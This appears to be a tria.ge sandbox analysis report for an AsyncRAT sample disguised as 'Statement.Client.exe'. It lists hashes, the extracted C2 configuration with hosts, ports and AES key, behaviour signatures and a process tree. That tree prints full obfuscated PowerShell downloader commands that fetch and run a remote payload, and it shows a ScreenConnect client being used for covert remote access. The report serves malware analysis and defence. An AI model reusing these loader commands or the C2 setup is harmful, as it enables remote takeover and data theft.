Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    145s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/12/2024, 16:04 UTC

General

  • Target

    Statement.Client.exe

  • Size

    81KB

  • MD5

    096c0bb01099ae31a11f12c4643b02de

  • SHA1

    5fecc71c4991d3bd64142fee92d5dd9cb689743c

  • SHA256

    72b2d87cf942f3c5dd92927098f59813c86ff94aa7805f82c70fec379a91e371

  • SHA512

    52395e5e344cb6ce5e9b92db081c8c5ca240df18917c25ba876793dcee4774b42b80356a6cf47d854a2f5a5179f4ffd0e64cfa79056960b9f479e0e1934b428c

  • SSDEEP

    1536:BoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaWPBJYYb7xJoZ:7enkyfPAwiMq0RqRfbaWZJYYbj0

Malware Config

Extracted

Family

asyncrat

Version

| Edit by Vinom Rat

Botnet

Default

C2

hegazy.ddns.net:6606

hegazy.ddns.net:7707

hegazy.ddns.net:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
lDH3ddaoYkvUIUARvoPatIHB8qXKo1yR

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detected Nirsoft tools 1 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Manipulates Digital Signatures 1 TTPs 2 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Statement.Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Statement.Client.exe"
    1⤵
    • Manipulates Digital Signatures
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3320
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
      2⤵
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3288
      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe
        "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe"
        3⤵
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:3356
        • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe
          "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:4232
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3320 -s 308
      2⤵
      • Program crash
      PID:2168
  • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe
    "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
    1⤵
    • Sets service image path in registry
    • Drops file in Windows directory
    • Executes dropped EXE
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:512
    • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe" "RunRole" "7d97551f-5fd1-435c-b5d6-4a43e6e2311c" "User"
      2⤵
      • Checks computer location settings
      • Drops file in System32 directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:704
      • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe
        "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe" "RunFile" "C:\Users\Admin\Documents\ConnectWiseControl\Temp\Caproyl.vbs"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:796
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Documents\ConnectWiseControl\Temp\Caproyl.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3208
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sulciform Sheephead Datovekslen Aliped #><#Unfulfilled Tibbu Domptr Aftereye Blizz #>$Hydropolyp='Stempellovenes';function Matranee($Pseudocyclosis){If ($host.DebuggerEnabled) {$Mineraloliernes=4} for ($Phenanthrene=$Mineraloliernes;;$Phenanthrene+=5){if(!$Pseudocyclosis[$Phenanthrene]) { break }$Quods+=$Pseudocyclosis[$Phenanthrene]}$Quods}function Oratoriske($jennifers){ .($Fugtigvarmes) ($jennifers)}$Sortermulighedens=Matranee 'PerinMisfE pliTSt.l.overWFotoeordsBVe,ec.esoLVirkiThisEOutbnHomoT';$Svinget=Matranee 'StedM.agroK ntzSpooiZayil TollButta.ata/';$Propupa=Matranee 'NotaTSt fl FinsAfst1Spad2';$Reactivations220='suit[F.ydnPen,e FoltNor,. FilSFlagEPotsrBevgVEs.diRetrc SleE RespSchoORatii G.on SkitTikmMPizeaNonpNSupea hrgBlueeUndeRdann]pseu:Tran:negeSVaa ePhrec De UForsrShipiVietT Te yTraspMaanR Pr,oPinuT.ondO .ulCEnkeOElveLTown=H rs$HoroP .orRP,ckOVidrPAnglUF.rrp artA';$Svinget+=Matranee 'Mea 5Adha.Gen.0 el Livs(NairWForpiJenhnUn ad VisoEstrwSupesArti Fe eNRampTGrie Disc1Udsl0Dksk.Jo f0Fixe; Rea DueW.egliHindnAfsk6 Vis4Brmm; S n D.ax Ls,6Best4U ex; Gyn MigrrAfdav Byb:Om a1Soci3Part1Opiu.Ma a0Dag )Rhap L ngGfineeSkolc ailkHexaoCo,d/Tena2 llo0Skov1Shak0Pi,c0S up1Inci0Kons1 rse JvniF Snai inarSquie potfOutdoBofoxF du/Slyn1.isc3Au t1 Sel.Udda0';$vedhnget=Matranee ' MilUe poSr,maEMundRMor.- E sABr pGEtr,e Paan HalT';$Yephede=Matranee 'Rillhfilot psptrefepForss St,:mili/Bioc/ brnfM toi anolOrgaePhotdAfsln Sem. SkaeWontuPerg/ istlAutomStorjInt,MMimb1PuppIIl.otC dbiPlusFDirtCPaavHkarrjWitcYFo,fAIns 4Ac iJFoneNInapRO erBAbutYAperBReit3Fleh4kbst/Fagov,undiDefieUncot PrenStana Se mmisv.Galat Milt Kphf';$Kapitulant=Matranee 'Cusc>';$Fugtigvarmes=Matranee 'F,lmiPeixESuk x';$Demotes='Duperede';$Natvgterstat='\Landbrugslovenes201.spr';Oratoriske (Matranee 'Caus$ TragAldeLSys oAsseblyseaYderLDele: ParFRyaeo,eksRw rcl K lyOraiS.otoTBe ye lanl igasS.igE K nsOve SVindy FloGFernt ,je= Ben$MaitE S.rnTic vNett: ahaForbpK biPTrskDPe,fAEl qtFe tASile+Bi.e$Kli N Plea FlotNonrvEulaGCrimt An EKak,rSvarsTragtSat.ANuclT');Oratoriske (Matranee 'Land$TrusGUdl.lAktiO goab StaA ftelPhot:KkkegSeedUForlMLubrmSor I SubH HonJ mi.uBerulWhipE U st SdeSInfe=El,k$S.miYAchrEDidePkabiHDdsdE Co.dReane hav.kuliSB.odP AstLu.deI .ontPri,(Magt$,ociKenqua eplP AffIImpuTscisu Su.lCon ABla NO tiTErst)');Oratoriske (Matranee $Reactivations220);$Yephede=$Gummihjulets[0];$Prepender=(Matranee 'F,st$CeleGKlevLNat,oFng B,ntiAHec.LD ce:PseufGnosiBrugn KriiC traEftelUnde=gr.pNRus,e forWGrov- AfkO ElaBTareJSlineVirkcBerrtCons PentsenclYEmicsCowltMaroEMassmDyst.Bede$EncuSInkaolactrConctUdtrE Ap rBagsMIncoU F.rL kooIFamiGSvunhB tie Ud DEnameBag nfo kS');Oratoriske ($Prepender);Oratoriske (Matranee ' Fre$Ska,FVenti ygnnDom,i Mugahyl.l O e. UndH atheAfruaS mfd De eAfslrBrudsdiso[Cre $skrdvServeblo dKapehInt nSubcgFrade EpitWere] Ker=Stib$ fsvSSkolvBe eiQuidnA prgGeneeSl,tt');$Downsteepy=Matranee ' Pol$RecaFWar i Subnw,iniBenzaPhonlKrys. GjoD,elgoBar w,enonBr llVandoParaaC rkds rvFMakuiAngulD ese A t(Nonh$KoksY emaeFarmpOverhInfieInfldF ale.van, pec$U.dePInd.rAssaoelengOverr R naServmDomss SlayDelfs TimtAcceeDd imOutseTjrnrCrysnInsteKontsWass)';$Programsystemernes=$Forlystelsessygt;Oratoriske (Matranee ' .ru$Swi gBenaLAld.o.kieb PriaMisclRedi:DyresLikvAPhylM SigLHy oiFo uVOlavS ttef Appo ProRStadh,ondoGiggl k nDep,ie ca.NDredEAdmiSFa e=Snea(Ind TTvrmEdelpsAport bro-TriupDig A.yttT solHPlad Br,g$ArsePUpasRRe poFul GPer ROpgaABj gMtir SInt YBy,dS Tr tPredESjokm LunEOutsrHol nOptieNongsTus )');while (!$Samlivsforholdenes) {Oratoriske (Matranee 'Goth$Non.gBorglSammoFeltbCi.uaF lolChap:KommHHenryO.erpHelveKonsr C,no eksx Logy enogHjere ftenAp liUdvisBudgeFrum=Slud$NordPIronh,hrie,ectnGkkeaUndenPra,tDoorhKu irMedie Udsn mageFabunP aip P.euNo.etH sss LortBroanS kkiHjo.n B,agSkrys') ;Oratoriske $Downsteepy;Oratoriske (Matranee 'AcidSFoldtFalla NyhrIn,etRefr-HalvSReirlPs,kem trE strpKrel Rhyn4');Oratoriske (Matranee 'Basi$ EmaGVaanlReveo,xciBEvanaAbo LPai.:V ndS AbeAStteMVoldl amfIboolvSha.ST pef depop.osRPuckHSubaoPerflDuodd armEDefiN Aa,eSalgSHenr=Uni.(FeritFgteeHospSsikkt sla- holPAcriAUdbatSwi hAn,u Need$krlip si RDaglOKalfg anRBibeaCaecm GassEremy PlesPu,kT rdeECadmM ypledommRPlannRes e SkeS yth)') ;Oratoriske (Matranee ' Hyp$SkrlG Begl SkuOGranBjoula entLArka:Skuefg nkASkjorKratVK kke skrLPatrAHyd D,andehje RAsa NA.skE Und=sv m$Melog OpbLAfs.Om.taBCafaAAlmel Re :S inUAi fD FinRUdtoE CymdTorgE inLImpisS ineOri rUndenUig,EThanSFors+Eska+Pa,e%Cent$ KnuGmyloU O eM ,alMOverIConcHChi JHoldUAbr.LforsEblanTTanksFot,. SelCMultOElituAmernNonct') ;$Yephede=$Gummihjulets[$Farveladerne]}$Annekteret42=299776;$Tentorial=31265;Oratoriske (Matranee ' Pan$Ecceg Br lAnkeoanliB M lAE islGuts:StikSFardmReplaInteA pheSMul KnonrO Me,VG anePaganO,blESustSBol. Su,=Unde Vi GSku.EPlayT Unp-O,bic rroUnmenNe sT AbaeB,azNT.aaT Plo Eje $ C.mPUddaR RatoOctegBdrmRDaarAFo,smBucosFaluYFoyaSFristLdgoe HypML geEMindrDsn NEmbuE ejs');Oratoriske (Matranee ' Ove$ HjegOst lV lko DvabSelvaEjstlhet : UndMEkspaAppes .likTra i,asvn Ca,tUdsviKonddcabb Proj=Shet Mar[Sur.S LgeyPreasVirktSzl.eVandmCard.,rolCSerboTrngn Birv ate Botrrundt,ymn]In e:Pil :BidsFSkinrOpsto premibr BGu daSamasOunceCa,t6Tea 4Sku SSylltNonir ZiriTelen.ajogInda( S,u$ iriSDopimRemia.reeaBenzs Lisk UndoCostv V seSkrinOdiseSpidsi it)');Oratoriske (Matranee 'Fuks$SeptgCantlProvO anbGramARedeL ong:PhrademboI AhaA I tPHer,EL euRho eS Ind1,tal4K ea2Niff Sier=B ck Sha[ AvnsKrn yPrevSS lvTRn eERataMS,te.letuTIndkeRuskxChrotCabi.TeraE IsoNUrt,CGenboB eddDownIToriNSup gWarm]Trim: Sou:Hem aFor,sHaa cProtiUdv,i im.Str,G.lasENegrTEf,eSAv rTKalmRKongiE panPudeg Ka.(Deri$M,liM,ereABortsu fekMomsi HydnDweetWoozI erud dup)');Oratoriske (Matranee 'Moon$Indvg TorlSan oMagnbPillASveslStat:Blo.vAlcaEK lllOs uaLoxotLatheMarqDY te=Berk$ V jDOveriFor a TerpIn,eeTetrr P,lS U,b1 Reg4Unal2 Hyd.BogtSFor UPladBPeptSMasstForeRVindiIn pNQuirgAfre( Fac$Sky,AS ccNbalanTidseSp.tKApp,TContEQuinrTrykeCacotbrug4Ina.2Demi,Vehe$Tankt B,leUvitn.mboTAccooEastREupni OutAhurtLOm l)');Oratoriske $Velated;"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2704
    • C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\0LRQ0ZTX.127\RRHZ5GDM.MZD\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\ScreenConnect.WindowsClient.exe" "RunRole" "4caf7e11-9a3b-435a-900c-87bb3cb25cf1" "System"
      2⤵
      • Drops file in System32 directory
      • Executes dropped EXE
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      PID:756
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c "C:\Windows\SystemTemp\ScreenConnect\24.3.7.9067\hVqvsfdxfEibrun.cmd"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1608
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -windowstyle hidden "<#Intermorainic Karines Pitman Unpertinently #><#Timetalsnedskringernes Cogwheels nongeographic Stammendes leans #>$Loopier='Gaminesque121';function Levnedsmiddelkontrollen($Adfrdsnorms){If ($host.DebuggerEnabled) {$Oolemma=4} for ($Brnderslevbo251=$Oolemma;;$Brnderslevbo251+=5){if(!$Adfrdsnorms[$Brnderslevbo251]) { break }$Emberizinae+=$Adfrdsnorms[$Brnderslevbo251]}$Emberizinae}function Pedelion($Operationsplanernes){ .($Mirounga) ($Operationsplanernes)}$Shilingi=Levnedsmiddelkontrollen 'LammnChesE Co tSyne.ShriwSl kEKderBShogC PreLDisti B gEIn.aNAu hT';$Hemicircle140=Levnedsmiddelkontrollen ' SanM Tigo PerzUk liPolylOpsal Outa Rin/';$Umoraliteters=Levnedsmiddelkontrollen ' T aTTveslBesvsThau1So s2';$Phrenologists='Arom[ DenNburgefu iTPr.o. Un sOpaceKatarPro,vJvnaI vecR gieFestp.ilkO LeviTranNBalttLd eMRnenA A,snkadmADomsGSyncEforerFi,m]k,de: ata:IndiSUn,aE p.rcUnvauHypoR ItcIMytit PhaY,ionPFaneR roOJo dtCereoSpi,c KilOguerLGoos= Oli$fremU Ho.MEc ooKoldR PrvAHva L OpriNonctPhi,EIndeTForteWettRForfs';$Hemicircle140+=Levnedsmiddelkontrollen 'Qu e5Use,.Twad0C nu Kon(StarWWeaviOve nathadT lsoO,chw Achs Sne B,ggNUhaaTLoet Unde1Refe0Buff.Udbl0By.r;Bauf Mo Wmycti Tesn reh6 Gen4Ov.r;Zoog VexixNonp6Stri4Deca; D f Noc,rudrmvOpga:A.ns1S yl3Flac1K.nd. pil0Mor,)T es LegGU cae istc.arak.ranoSked/Gjal2 isa0Sten1Lae.0Unfr0Anst1T rk0 Sem1Vaca pshFAnaci ValrRunoeS agfLittoFolkxFors/smal1 Afl3 E.t1Fakt.Topm0';$legalisere=Levnedsmiddelkontrollen 'AadaUVul SCoc.EBor.RMalk- HklaLithGS.cueXyphnEvant';$Sandhedsserumer=Levnedsmiddelkontrollen 'SterhKonftTeglt s,vp oadsCiv : Cor/ ork/Udstf ArciHaanlCon.eVoucdVi nnZero.Sekue Fe uUnab/Syenl Gram slbjKitcMP.ro1UnhyI opit ViriHvl FFj.rCGalaHOndsjPreiYHe aA.eac4DataJAutoNI,reRNeurBFrizYBautBB st3Unid4Stat/ inddHesti Ra fTrusfBeg,e yrirArdueCrennSkams SlarSid k insk Pare UndrProk.SklmdEne.s,elep';$Fascineredes=Levnedsmiddelkontrollen ' San>';$Mirounga=Levnedsmiddelkontrollen ' AnoiBl aeA.tix';$Aspring='Imperceptibly';$Wernas='\Intimidity.Alb';Pedelion (Levnedsmiddelkontrollen '.run$gtheG PenLHan,oSmulbVersaBabalS um:SrloAPiddlBrneKLacuo MdeHs rjOHapllcaz ISkafs rteL.mir eurePer.tOmty=Agro$ Ad EHofdNAntivStrr:R gnaEk,aP aboPFi tD,uspaStruTGrova emm+ P e$adelWE.seeMinirrillNCycaAP.isS');Pedelion (Levnedsmiddelkontrollen 'Pinu$ onfGva el nto.polb.ilbaUpholChe : .ulEPrelO Un.NMet,iAf iSallaM Do S Vic=Ha e$Afbls nsha ennF.atDF mshSeclE Tridkon,SBi.oS Emme,utir vauSepaMMargEMickrBek,. UndSHegePS bhlAnstiDistTcopa(Boos$TinsF me a aglS aadcPreri BlanFellEholorPiale ArodInvaeSimpSIn,u)');Pedelion (Levnedsmiddelkontrollen $Phrenologists);$Sandhedsserumer=$Eonisms[0];$dommerkendelsernes=(Levnedsmiddelkontrollen 'Komp$DizzG,rkilcorrOTrifb obbA,elolTram:Sce ITvedtBoniE .ifrMimiaT,rpTResseE uiLMarkYOkse=AssenSwerePantWReav-GtteOBgebBTri.jConverecoc kaT Pe. Am eSPa.tyPo,ts relTSvinEne,rM Epi.Pr,o$GaliSKingH BrniLa nL PadIForpNUncegBewiI');Pedelion ($dommerkendelsernes);Pedelion (Levnedsmiddelkontrollen 'Extr$cistICl.rt .leeNut,r SynaSe ttBrone P.ml CacyChea.D ssHSprieg laasnevd Mase Char GensInad[ An $Glacl We eW odgShedaGruplGatei FfesL.vie NonrNonme Sam] De,=Unit$FemeH Tupest.imMul iHegecYuckiStoirVrdic RaalTi beUnhy1,arm4Cool0');$Seattle=Levnedsmiddelkontrollen 'Porn$airwIMetat,lageRyper DefaPenst lyseBroel LexyHur . ekDCrinoMariwGullnPaaslsacaoFeataQuizdVlt.F,etiiSp ilUnace Fem(Hu o$ narSMurmaPerpnBirgdPorchConneLi edRustsOlivs Rede Nonr ,inuLetfm ShaeIrrarform,Skik$PjevSUn et t no Blor ,oseNemesTimosUnautEnderV nteHaulnR,coe Ca,)';$Storesstrene=$Alkoholiseret;Pedelion (Levnedsmiddelkontrollen 'Bod,$ legGSubjl ,enOArkib R sAOmvelMyel:SharRSl,teSkrolCo ooKichAReguD OpeEArmaDguin2Summ5 Lig4 O r=Cons(LygtTTi,sESer,sintitPike-RevePSikkaFurrTAv.sHHove phe$For.sE,isttjenoDeporIsseE Mi SFjorSP.olTMcfaRstoreSydlNS anES ak)');while (!$Reloaded254) {Pedelion (Levnedsmiddelkontrollen 'Dram$UdbegDat,lEt.noEmanbportaUprclU.by:O erQP ogyUnth= Sys$Unt P BlolfremuSmugkFum kFutue') ;Pedelion $Seattle;Pedelion (Levnedsmiddelkontrollen 'ForkSLuksTNedgA Star AntT um-.ildsOme.L Note Intea.slp Smi Math4');Pedelion (Levnedsmiddelkontrollen 'Libi$GelagCartlUnaco ty BIsotAco eLTrea: MacRBabieJvneLNubioPolyAFcytdTilseAffldFe,t2 Fll5Kamp4Regn=Gill(He,stMandEAvlssN tctTra,-usurPCo,paRi,at Urohpirr Arb$InteSTri.T,gesOShivr R dEjerksPen.S raT S oR BeleFactNR tseBu m)') ;Pedelion (Levnedsmiddelkontrollen ' Ge $InjuGHje lBowloHuspBFlysAOutsLStiv:CyanS numiUdt LAntiIRensc ppeeMannOtrylU udtsMero=Sed,$E.udg ekelmyxoOTotab ipoa ForlOpka:SekrCSantoCry,nAfkvGGesjeStrinAsseI rema C,tlChacN.orsEBrneSNonosRach+Fibe+phot%Be,i$IllgESka.oFluin BemIUbevs UnsmAfpaSVagt. T kC inOops u AfvN UfoT') ;$Sandhedsserumer=$Eonisms[$siliceous]}$Diacetylmorphine=330880;$Termined233=29940;Pedelion (Levnedsmiddelkontrollen 'Sena$ ktig tralSalaO ondBAcidaprivlKome:VaabKAppra,pusr Camt deno dehnCrzeNStnna SmuGBommesymfrVa cNHisteS,de Gene=Spir acgRaceeOptaT O,p-SvigcSchnoMe iNTet TBedee.chnnBetrTGian B ll$Bef.s ProTRus oUd.eRHaldE.iggs Gi s indTpatrrTegnE FarNUdtre');Pedelion (Levnedsmiddelkontrollen 'Hunl$g uegSubclRomeo HelbtaktaCauslEl,c:Gu rC foraMetarUdslr eariC yoaMossg,chieSy.olLacreA sks ntrsSo a Sou =Lyse M dv[BushSDampyDarrsGlaitFolkebalsmp.st.U flCDiptoN ncn ydvInteeShanrPolyt utt]Sild:kar : Id Fse erRescoSydkmTer BRei aUnwisRampe tvl6 Ti,4AntiSHjemtl,nsrB.dei Nitn progLapi(Sgel$ParaK annaTamar KontFaaroAdumntopmnFlgeaKrafg BoreTrikr Komn .rieHatp)');Pedelion (Levnedsmiddelkontrollen 'Lted$U prgSlv.l SepOFiguBG,atA abel St.:Spi.v HanaWharAPamfNI dbITuskNSpo G ngisFupmHprogUV rmsbest Misp=Al.o Sml[ xons UdkYDom s SkatFleteGaram Boe. H.eTPrkeETra X PreT Sap.SpytEAfmnneutycSelso asddGrynIUbehn AveGPuff]Rnne:,als:Indba,iazs K,aCEfteI Du i Squ.R jsGF.rfe edT ProsTilttSe vRHumaiSubwnforigno,c(Semi$choncmasha ManRLu eRQuarI CleaKarbG SadESp rLMa oE NorSM biSSmu )');Pedelion (Levnedsmiddelkontrollen 'Pick$Byn.gTubal ByloAntib fora NotL Tak:A siuTomiNPerib KnoUVareR Rene SmaACeruUSekaC Linr QuaaElmatAncyiAndac andaD izlTyndl trayLumi=Op t$S,krvEn,raStapaforenMicrIKa,vn SekgStjlSCu hHOkkeUI ersCep .serisLodeu erbMiliSNon TUnherMaggI UdhnMartGMall( Sh $ StdDD olI slaA Un c amme EliTor,hyUdvilE,spmDrmmOB lir Timp Ku,HZinkIBothn Kone Y,s,.kib$UnmetcentEBe zrToddmperii ocN MolE,kanD Gen2 For3Sira3Komm)');Pedelion $Unbureaucratically;"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1660
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Intermorainic Karines Pitman Unpertinently #><#Timetalsnedskringernes Cogwheels nongeographic Stammendes leans #>$Loopier='Gaminesque121';function Levnedsmiddelkontrollen($Adfrdsnorms){If ($host.DebuggerEnabled) {$Oolemma=4} for ($Brnderslevbo251=$Oolemma;;$Brnderslevbo251+=5){if(!$Adfrdsnorms[$Brnderslevbo251]) { break }$Emberizinae+=$Adfrdsnorms[$Brnderslevbo251]}$Emberizinae}function Pedelion($Operationsplanernes){ .($Mirounga) ($Operationsplanernes)}$Shilingi=Levnedsmiddelkontrollen 'LammnChesE Co tSyne.ShriwSl kEKderBShogC PreLDisti B gEIn.aNAu hT';$Hemicircle140=Levnedsmiddelkontrollen ' SanM Tigo PerzUk liPolylOpsal Outa Rin/';$Umoraliteters=Levnedsmiddelkontrollen ' T aTTveslBesvsThau1So s2';$Phrenologists='Arom[ DenNburgefu iTPr.o. Un sOpaceKatarPro,vJvnaI vecR gieFestp.ilkO LeviTranNBalttLd eMRnenA A,snkadmADomsGSyncEforerFi,m]k,de: ata:IndiSUn,aE p.rcUnvauHypoR ItcIMytit PhaY,ionPFaneR roOJo dtCereoSpi,c KilOguerLGoos= Oli$fremU Ho.MEc ooKoldR PrvAHva L OpriNonctPhi,EIndeTForteWettRForfs';$Hemicircle140+=Levnedsmiddelkontrollen 'Qu e5Use,.Twad0C nu Kon(StarWWeaviOve nathadT lsoO,chw Achs Sne B,ggNUhaaTLoet Unde1Refe0Buff.Udbl0By.r;Bauf Mo Wmycti Tesn reh6 Gen4Ov.r;Zoog VexixNonp6Stri4Deca; D f Noc,rudrmvOpga:A.ns1S yl3Flac1K.nd. pil0Mor,)T es LegGU cae istc.arak.ranoSked/Gjal2 isa0Sten1Lae.0Unfr0Anst1T rk0 Sem1Vaca pshFAnaci ValrRunoeS agfLittoFolkxFors/smal1 Afl3 E.t1Fakt.Topm0';$legalisere=Levnedsmiddelkontrollen 'AadaUVul SCoc.EBor.RMalk- 